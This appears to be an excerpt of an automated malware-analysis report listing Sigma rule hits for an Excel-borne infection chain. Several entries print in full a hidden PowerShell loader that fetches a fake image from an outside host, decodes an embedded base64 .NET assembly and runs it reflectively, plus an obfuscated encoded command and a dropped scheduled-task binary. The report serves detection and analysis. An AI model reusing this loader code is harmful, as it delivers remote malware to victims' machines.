              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDgDgTreNQDgTrevDgTreDcDgTreMgDgTrewDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDYDgTreMwDgTrewDgTreDcDgTreNgDgTrezDgTreDQDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTr
              Source: Network ConnectionAuthor: Max Altgelt (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49171, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3348, Protocol: tcp, SourceIp: 198.46.177.156, SourceIsIpv6: false, SourcePort: 80
              Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634', 'https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.GBR/0808/651.771.64.891//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))} }", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634', 'https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.GBR/0808/651.771.64.891//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))} }", Comm
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDgDgTreNQDgTrevDgTreDcDgTreMgDgTrewDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDYDgTreMwDgTrewDgTreDcDgTreNgDgTrezDgTreDQDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTr
              Source: Network ConnectionAuthor: frack113, Florian Roth: Data: DestinationIp: 188.114.96.3, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\wscript.exe, Initiated: true, ProcessId: 3420, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49172
              Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\lionarekingofjungleimageshe.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\lionarekingofjungleimageshe.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2772, ParentProcessName: EXCEL.EXE, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\lionarekingofjungleimageshe.vbs" , ProcessId: 3420, ProcessName: wscript.exe
              Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\lionarekingofjungleimageshe.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\lionarekingofjungleimageshe.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2772, ParentProcessName: EXCEL.EXE, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\lionarekingofjungleimageshe.vbs" , ProcessId: 3420, ProcessName: wscript.exe
              Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDgDgTreNQDgTrevDgTreDcDgTreMgDgTrewDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDYDgTreMwDgTrewDgTreDcDgTreNgDgTrezDgTreDQDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTr
              Source: Network ConnectionAuthor: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0", Tim Shelton: Data: DestinationIp: 54.241.153.192, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Initiated: true, ProcessId: 2772, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49161
              Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: C:\Users\user\AppData\Roaming\rugtucw, CommandLine: C:\Users\user\AppData\Roaming\rugtucw, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\rugtucw, NewProcessName: C:\Users\user\AppData\Roaming\rugtucw, OriginalFileName: C:\Users\user\AppData\Roaming\rugtucw, ParentCommandLine: taskeng.exe {2B2AF159-87EA-4DB0-87E1-2E594ED3F3FE} S-1-5-21-966771315-3019405637-367336477-1006:user-PC\user:Interactive:[1], ParentImage: C:\Windows\System32\taskeng.exe, ParentProcessId: 4004, ParentProcessName: taskeng.exe, ProcessCommandLine: C:\Users\user\AppData\Roaming\rugtucw, ProcessId: 4036, ProcessName: rugtucw
              Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 188.114.96.3, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\wscript.exe, Initiated: true, ProcessId: 3420, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49172
              Source: Network ConnectionAuthor: X__Junior (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49161, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Initiated: true, ProcessId: 2772, Protocol: tcp, SourceIp: 54.241.153.192, SourceIsIpv6: false, SourcePort: 80
              Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634', 'https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.GBR/0808/651.771.64.891//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))} }", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634', 'https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.GBR/0808/651.771.64.891//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))} }", Comm
              Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634', 'https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.GBR/0808/651.771.64.891//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))} }", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634', 'https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.GBR/0808/651.771.64.891//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))} }", Comm
              Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\lionarekingofjungleimageshe.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\lionarekingofjungleimageshe.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2772, ParentProcessName: EXCEL.EXE, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\lionarekingofjungleimageshe.vbs" , ProcessId: 3420, ProcessName: wscript.exe
